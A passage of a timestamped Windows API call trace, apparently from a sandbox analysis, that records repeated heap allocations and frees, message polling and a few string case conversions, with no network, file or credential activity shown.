dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0208.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0208.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0208.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0208.371] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0208.371] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0208.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0208.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0208.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0208.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0208.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0208.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0208.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0208.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0208.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0208.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.372] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0208.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0208.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0208.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0208.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0208.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0208.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0208.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0208.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0208.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0208.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0208.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0208.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0208.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0208.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0208.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0208.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0208.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0208.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0208.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0208.373] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0208.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0208.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0208.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0208.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0208.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0208.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0208.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0208.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0208.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0208.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0208.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0208.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0208.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0208.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0208.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0208.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0208.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0208.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0208.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0208.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0208.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0208.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0208.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0208.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0208.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0208.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0208.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0208.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0208.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0208.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0208.375] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0208.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0208.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0208.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0208.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0208.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0208.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0208.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0208.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0208.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0208.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0208.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0208.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0208.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0208.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0208.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0208.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0208.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18e8 [0208.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0208.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0208.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0208.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18f8 [0208.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0208.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0208.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0208.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0208.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0208.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0208.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0208.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.377] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0208.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0208.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0208.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0208.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0208.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0208.378] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0208.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0208.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0208.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa868 [0208.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0208.378] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0208.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.378] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0208.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0208.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0208.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0208.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0208.379] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0208.379] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0208.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0208.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0208.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0208.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0208.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0208.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0208.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0208.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0208.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0208.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0208.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0208.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0208.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0208.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0208.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0208.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0208.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0208.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0208.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0208.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0208.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0208.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0208.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.382] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0208.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0208.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0208.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0208.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0208.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0208.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0208.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0208.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0208.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0208.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0208.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0208.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0208.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: 